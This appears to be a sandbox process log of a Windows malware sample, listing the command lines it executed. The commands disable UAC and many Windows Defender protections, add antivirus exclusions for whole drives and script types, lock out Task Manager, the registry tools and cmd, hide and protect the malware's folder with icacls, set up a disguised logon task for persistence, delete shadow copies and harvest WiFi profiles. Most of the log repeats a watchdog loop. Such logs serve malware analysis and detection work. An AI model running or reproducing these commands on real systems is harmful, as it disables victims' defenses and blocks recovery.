C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
C:\Windows\system32\icacls.exe
icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\$Sys-Manager\systemservice92.exe
"C:\$Sys-Manager\systemservice92.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\icacls.exe
icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"
C:\Windows\system32\icacls.exe
icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""
C:\Windows\system32\attrib.exe
attrib +h "C:\$Sys-Manager\desktop.ini"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\$Sys-Manager\systemservice92.exe
"C:\$Sys-Manager\systemservice92.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Windows\SYSTEM32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath '.exe'"
C:\Windows\SYSTEM32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath '.bat'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath '.py'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"
C:\Windows\System32\Wbem\wmic.exe
wmic product get name
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
C:\Windows\system32\reg.exe
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f
C:\Windows\system32\reg.exe
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f
C:\Windows\SYSTEM32\reg.exe
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f
C:\Windows\SYSTEM32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im firefox.exe
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"
C:\Windows\system32\icacls.exe
icacls "C:\Users" /grant Admin:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"
C:\Windows\system32\icacls.exe
icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"
C:\Windows\system32\icacls.exe
icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"
C:\Windows\system32\icacls.exe
icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts
C:\Windows\SYSTEM32\setx.exe
setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI39922\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI23842\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\reg.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo %USERNAME%"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"
C:\Windows\system32\netsh.exe
netsh wlan show interfaces
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
